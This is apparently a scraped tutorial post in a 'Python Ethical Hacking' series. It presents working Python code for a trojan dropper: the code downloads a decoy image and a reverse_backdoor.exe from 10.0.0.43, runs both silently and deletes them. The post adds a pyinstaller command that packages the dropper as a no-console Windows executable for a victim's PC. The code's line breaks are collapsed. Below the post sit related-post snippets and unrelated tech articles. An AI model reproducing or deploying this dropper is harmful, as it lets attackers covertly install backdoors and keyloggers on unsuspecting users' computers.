TROJANS

A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc).

When executed:

1. Opens the normal file that the user expects.

2. Executes evil code in the background (run a backdoor/keylogger ..etc).

Download & Execute Payload

  • A generic executable that downloads & executes files.
  • Ideas:
  • Download backdoor + keylogger.
    • Download keylogger + password recovery tool.
    • Download keylogger + password recovery tool + backdoor.
    • Use it as a trojan -- evil file + a normal file.

Create the download_and_exeucte Python code:

#!/usr/bin/env python
import os
import subprocess
import requests
import tempfile def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content) temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
print(temp_directory) download("http://10.0.0.43/evil-files/Galaxy.jpg")
subprocess.Popen("Galaxy.jpg", shell=True) download("http://10.0.0.43/evil-files/reverse_backdoor.exe")
subprocess.call("reverse_backdoor.exe", shell=True) os.remove("Galaxy.jpg")
os.remove("reverse_backdoor.exe")

Convert the Python Program to Windows Executable.

wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-/Scripts/pyinstaller.exe download_and_execute.py --onefile --noconsole

Execute the download_and_execute.exe file on the vitim PC.

The user can only see a normal picture, but the communication has been established background.

Python Ethical Hacking - TROJANS Analysis(1)的更多相关文章

  1. Python Ethical Hacking - TROJANS Analysis(2)

    DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantag ...

  2. Python Ethical Hacking - TROJANS Analysis(4)

    Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Conver ...

  3. Python Ethical Hacking - TROJANS Analysis(5)

    Spoofing File Extention - A trick. Use the Kali Linux Program - Characters 1. Open the program. 2. F ...

  4. Python Ethical Hacking - TROJANS Analysis(3)

    BYPASSING ANTI-VIRUS PROGRAMS AV programs detect viruses based on: 1. Code - compare files to huge d ...

  5. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  6. Python Ethical Hacking - Malware Analysis(4)

    DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. ...

  7. Python Ethical Hacking - Malware Analysis(3)

    Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...

  8. Python Ethical Hacking - Malware Analysis(2)

    Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...

  9. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

随机推荐

  1. 富文本插件tinymce初始化配置参数说明

    { language: _this.language, // 显示语种 selector: #${_this.tinymceId}, // 容器的id height: _this.height, // ...

  2. vue-admin-template搭建后台管理系统的学习(一)

    首先我们来看看这个基础模版的目录结构 ├── build // 构建相关  ├── config // 配置相关├── src // 源代码│   ├── api // 所有请求│   ├── ass ...

  3. Linux远程连接mongodb

    当没有客户端工具,eg:robo3T时,如何修改mongodb里的数据呢? 1.连接mongodb服务器mongo 1.1.1.1:1688 2.查看数据库列表show dbs 3.选择使用log库u ...

  4. intellij配置github

    一.在IDEA中设置Git,在File-->Setting->Version Control-->Git-->Path to Git executable选择你的git安装后的 ...

  5. skywalking与pinpoint全链路追踪方案对比

    由于公司目前有200多微服务,微服务之间的调用关系错综复杂,调用关系人工维护基本不可能实现,需要调研一套全链路追踪方案,初步调研之后选取了skywalking和pinpoint进行对比; 选取skyw ...

  6. windows 创建python独立开发环境

    参考廖雪峰教程:https://www.liaoxuefeng.com/wiki/1016959663602400/1019273143120480 进去的方式需要修改,找到自己创建的文件目录 在控制 ...

  7. json自定制

    import json from datetime import date from datetime import datetime class JsonCustomEncoder(json.JSO ...

  8. django.core.exceptions.ImproperlyConfigured: mysqlclient 1.3.13 or newer is required; you have 0.9.2的最佳处理方法,亲测可用

    django.core.exceptions.ImproperlyConfigured: mysqlclient 1.3.13 or newer is required; you have 0.9.2 ...

  9. (五)ELK Logstash output

    # 输出插件将数据发送到一个特定的目的地, 除了elasticsearch还有好多可输出的地方, 例如file, csv, mongodb, redis, syslog等 output { if [t ...

  10. Linux进程监控命令

    最近使用centos在建站,没有用市面上的什么服务商的服务器,自己用树莓派3B+建了这个博客.但是发现经常宕机,所以想看看服务器在干什么,百度了很久,发现vmstat命令不错,拿出来推荐推荐. 这是我 ...